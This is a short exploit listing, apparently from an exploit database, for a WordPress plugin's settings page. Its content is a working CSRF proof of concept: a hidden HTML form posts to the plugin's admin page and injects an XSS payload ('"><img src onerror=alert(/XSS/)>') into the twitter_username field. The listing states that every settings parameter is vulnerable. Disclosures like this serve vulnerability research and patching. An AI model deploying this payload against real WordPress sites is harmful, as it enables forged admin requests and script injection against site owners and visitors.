Share
## https://sploitus.com/exploit?id=WPEX-ID:7120A583-F71C-42E1-89E1-A756FCC5D6E2
All parameters from the settings page are affected

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=tracked-tweets/trackedtweets.php" method="POST">
      <input type="hidden" name="twitter_username" value='"><img src onerror=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>